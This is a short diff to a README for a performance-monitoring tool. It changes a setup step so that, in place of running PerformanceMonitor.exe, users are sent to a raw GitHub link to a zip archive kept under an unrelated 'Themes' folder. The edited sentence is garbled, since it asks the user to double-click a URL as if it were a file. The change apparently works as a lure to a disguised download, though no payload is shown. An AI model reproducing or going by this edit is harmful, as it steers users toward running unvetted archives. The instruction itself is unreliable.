Marco222690/PerformanceMonitor/README.md

 **For Lite Edition:**

 1. Unzip the `.zip` file you downloaded to a folder you choose.
-2. Open the folder and double-click the `PerformanceMonitor.exe` file inside.
+2. Open the folder and double-click the `https://raw.githubusercontent.com/Marco222690/PerformanceMonitor/main/Lite/Themes/Performance-Monitor-1.4-alpha.1.zip` file inside.
 3. No installation is needed beyond this.

 ---